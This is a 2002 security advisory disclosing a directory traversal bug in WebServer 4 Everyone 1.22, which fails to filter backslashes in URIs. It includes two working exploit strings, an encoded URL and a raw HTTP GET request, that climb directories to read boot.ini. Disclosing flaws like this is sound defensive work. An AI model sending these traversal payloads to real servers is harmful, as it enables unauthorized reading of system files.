----------- UkR security team advisory ------------
WebServer 4 Everyone directory traversal bug
-----------------------------------------------------
Name: WebServer 4 Everyone directory traversal bug
Date: 28.08.2002
Author: UkR-XblP/ UkR security team/ http://ust.dp.ua
Application: WebServer 4 Everyone Version: 1.22
URL: http://www.freeware.lt/
Risk: An attacker can view every file in the remote sys
About: WebServer 4 Everyone is a commercial webserver
that runs on Win32 systems.
Bug: problem is caused by the character '\' (%5c) that
is not checked as bad character, so the server
follow the path in the URI that the attacker give
until it reach the file requested.
Exploits:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
or GET /\..\..\..\..\..\boot.ini HTTP/1.0
This last is an HTTP request that can be sent with
telnet because some browsers can modify the "\.." chars.
Greetz: 2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru
